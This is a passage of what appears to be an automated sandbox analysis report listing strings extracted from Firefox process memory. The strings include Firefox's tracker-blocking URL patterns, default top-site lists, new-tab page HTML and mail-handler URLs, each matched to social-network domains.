"*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "requestHeaders"]]https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "requestHeaders"]]https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: devtools/client/framework/devtools-browser^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)DevTools telemetry entry point failed: JSON Viewer's onSave failed in startPersistencebrowser.fixup.domainsuffixwhitelist.get FIXUP_FLAGS_MAKE_ALTERNATE_URI^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?devtools.performance.recording.ui-base-url@mozilla.org/uriloader/handler-service;1get FIXUP_FLAG_FORCE_ALTERNATE_URIUnable to start devtools server on DevToolsStartup.jsm:handleDebuggerFlag@mozilla.org/network/protocol;1?name=filebrowser.urlbar.dnsResolveFullyQualifiedNames^([a-z+.-]+:\/{0,3})*([^\/@]+@).+No callback set for this channel.devtools.performance.popup.feature-flagWebChannel/this._originCheckCallbackreleaseDistinctSystemPrincipalLoaderFailed to listen. Callback argument missing.Failed to listen. Listener already attached.{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}@mozilla.org/network/protocol;1?name=defaultbrowser.fixup.dns_first_for_single_wordsdevtools/client/framework/devtoolsget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPresource://devtools/server/devtools-server.jsresource://devtools/shared/security/socket.jsresource://gre/modules/FileUtils.sys.mjsgecko.handlerService.defaultHandlersVersionisDownloadsImprovementsAlreadyMigratedhttp://www.inbox.lv/rfc2368/?value=%shttps://mail.inbox.lv/compose?to=%sCan't invoke URIFixup in the content process{c6cf88b7-452e-47eb-bdc9-86e3561648ef}https://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/uriloader/local-handler-app;1_injectDefaultProtocolHandlersIfNeededresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/NetUtil.sys.mjsresource://gre/modules/URIFixup.sys.mjsextractScheme/fixupChangedProtocol<resource://gre/modules/JSONFile.sys.mjshandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/web-handler-app;1http://win.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/network/file-input-stream;1{33d75835-722f-42c0-89cc-44f328e56a86}Scheme should be either http or httpsresource://gre/modules/DeferredTask.sys.mjs_finalizeInternal/this._finalizePromise<http://compose.mail.yahoo.co.jp/ym/Compose?To=%s@mozilla.org/network/async-stream-copier;1extension/default-theme@mozilla.org/extendedData@mozilla.org/uriloader/dbus-handler-app;1http://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/FileUtils.sys.mjsMust have a source and a callback@mozilla.org/intl/converter-input-stream;1https://poczta.interia.pl/mh/?mailto=%s@mozilla.org/network/simple-stream-listener;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%spdfjs.previousHandler.preferredActionhttps://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/network/input-stream-pump;1Non-zero amount of bytes must be specifiedVALIDATE_DONT_COLLAPSE_WHITESPACEhttps://mail.yandex.ru/compose?mailto=%spdfjs.previousHandler.alwaysAskBeforeHandling@mozilla.org/scriptableinputstream;1newChannel requires a single object argumentSEC_ALL
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2880310530.000001DE05603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2880310530.000001DE05603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07870000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07870000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07870000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE00172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889518477.000001DE05FB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/P equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/P equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/P equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2959734574.000002EE0A400000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: webcompat-reporter@mozilla.org.xpi*://www.everestjs.net/static/st.v3.js*FileUtils_closeSafeFileOutputStreamresource://gre/modules/addons/XPIProvider.jsm@mozilla.org/network/file-output-stream;1*://pub.doubleverify.com/signals/pub.js**://c.amazon-adsystem.com/aax2/apstag.js*://auth.9c9media.ca/auth/main.js*://static.chartbeat.com/js/chartbeat.js*://static.chartbeat.com/js/chartbeat_video.jswebcompat-reporter%40mozilla.org:1.5.1*://static.criteo.net/js/ld/publishertag.js*://*.imgur.com/js/vendor.*.bundle.js*://*.imgur.io/js/vendor.*.bundle.js*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/sdk.js**://connect.facebook.net/*/all.js*@mozilla.org/network/safe-file-output-stream;1FileUtils_openSafeFileOutputStreamFileUtils_closeAtomicFileOutputStreamhttps://smartblock.firefox.etp/facebook.svg*://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.js*://ssl.google-analytics.com/ga.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.googletagservices.com/tag/js/gpt.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://*.moatads.com/*/moatheader.js**://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://www.google-analytics.com/gtm/js**://cdn.optimizely.com/public/*.js*://cdn.adsafeprotected.com/iasPET.1.js*://s0.2mdn.net/instream/html5/ima3.js*://*.vidible.tv/*/vidible-min.js**://s.webtrends.com/js/advancedLinkTracking.js*://static.adsafeprotected.com/iasPET.1.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.jsTelemetrySession::onEnvironmentChange equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2885954167.000001DE05A19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2876461251.000001DE04880000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2959734574.000002EE0A400000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2959734574.000002EE0A400000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2876461251.000001DE04880000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2876461251.000001DE04828000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878398866.000001DE049EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00154000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", 